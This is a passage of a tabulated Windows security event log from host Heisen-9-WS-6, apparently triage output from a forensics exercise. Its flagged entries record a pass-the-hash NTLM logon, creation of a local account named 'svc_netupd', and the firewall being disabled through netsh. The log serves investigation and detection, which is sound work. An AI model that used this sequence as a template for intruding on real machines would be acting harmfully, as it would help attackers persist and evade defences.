#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-24 23:00:24 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 4421      &#9474; Heisen-9-WS-6   &#9474; TargetUserName: Werni            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 3                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-1002   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: HEISEN-9-WS-   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 6                                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x432943'        &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-24 23:00:24 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 4422      &#9474; Heisen-9-WS-6   &#9474; TargetUserName: Werni            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 3                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-1002   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: HEISEN-9-WS-   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 6                                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x434496'        &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-24 23:00:32 &#9474; &#8227; Pass the Hash Activity            &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4624     &#9474; 4424      &#9474; Heisen-9-WS-6   &#9474; AuthenticationPackageName: NTL   &#9474;
&#9474;                     &#9474; 2                                   &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; M                                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; LogonProcessName: NtLmSsp        &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetOutboundDomainName: '-'    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLinkedLogonId: '0x0'       &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; LmPackageName: NTLM V2           &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: HEISEN-9-WS-   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 6                                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectUserName: '-'             &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-1002   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; IpAddress: 10.129.242.110        &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; KeyLength: 0                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectLogonId: '0x0'            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x795881'        &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ElevatedToken: '%%1842'          &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; LogonGuid: 00000000-0000-0000-   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 0000-000000000000                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; RestrictedAdminMode: '-'         &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectDomainName: '-'           &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 3                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; VirtualAccount: '%%1843'         &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetOutboundUserName: '-'      &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; WorkstationName: '-'             &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; IpPort: '56570'                  &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ImpersonationLevel: '%%1833'     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectUserSid: S-1-0-0          &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TransmittedServices: '-'         &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ProcessId: '0x0'                 &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserName: Werni            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ProcessName: '-'                 &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-24 23:02:32 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 4449      &#9474; Heisen-9-WS-6   &#9474; TargetUserName: Werni            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 3                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-1002   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: HEISEN-9-WS-   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 6                                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x7958e6'        &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-24 23:04:33 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 4455      &#9474; Heisen-9-WS-6   &#9474; TargetUserName: Werni            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 3                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-1002   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: HEISEN-9-WS-   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 6                                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x8cf60a'        &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-24 23:05:09 &#9474; &#8227; A Member Was Added to             &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4728     &#9474; 4460      &#9474; Heisen-9-WS-6   &#9474; MemberName: '-'                  &#9474;
&#9474;                     &#9474; a Security-Enabled Global           &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; MemberSid: S-1-5-21-3871582759   &#9474;
&#9474;                     &#9474; Group                               &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; -1638593395-315824688-1003       &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; PrivilegeList: '-'               &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectDomainName: WORKGROUP     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: HEISEN-9-WS-   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 6                                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectUserSid: S-1-5-18         &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserName: None             &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetSid: S-1-5-21-3871582759   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; -1638593395-315824688-513        &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectLogonId: '0x3e7'          &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectUserName: HEISEN-9-WS-6   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; $                                &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-24 23:05:09 &#9474; &#8227; Local User Creation               &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4720     &#9474; 4461      &#9474; Heisen-9-WS-6   &#9474; UserWorkstations: '%%1793'       &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; PrivilegeList: '-'               &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; OldUacValue: '0x0'               &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; NewUacValue: '0x15'              &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; UserPrincipalName: '-'           &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: HEISEN-9-WS-   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 6                                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; LogonHours: '%%1797'             &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ScriptPath: '%%1793'             &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; PasswordLastSet: '%%1794'        &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; UserParameters: '%%1793'         &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectLogonId: '0x3e7'          &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ProfilePath: '%%1793'            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; AllowedToDelegateTo: '-'         &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectDomainName: WORKGROUP     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; HomePath: '%%1793'               &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; AccountExpires: '%%1794'         &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectUserSid: S-1-5-18         &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; DisplayName: '%%1793'            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; HomeDirectory: '%%1793'          &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserName: svc_netupd       &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; UserAccountControl: "\r\n\t\t%   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; %2080\r\n\t\t%%2082\r\n\t\t%%2   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 084"                             &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SidHistory: '-'                  &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetSid: S-1-5-21-3871582759   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; -1638593395-315824688-1003       &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SamAccountName: svc_netupd       &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectUserName: HEISEN-9-WS-6   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; $                                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; PrimaryGroupId: '513'            &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-24 23:06:08 &#9474; &#8227; Windows Firewall Settings         &#9474; 1     &#9474; Microsoft-Windows-Windows Fire &#9474; 2003     &#9474; 1547      &#9474; Heisen-9-WS-6   &#9474; ModifyingUser: S-1-5-21-387158   &#9474;
&#9474;                     &#9474; Have Been Changed                   &#9474;       &#9474; wall With Advanced Security    &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-1002   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SettingValueSize: 4              &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ModifyingApplication: C:\Windo   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ws\System32\netsh.exe            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SettingValue: '00000000'         &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SettingType: 1                   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; Profiles: 1                      &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; Origin: 1                        &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SettingValueString: No           &#9474;
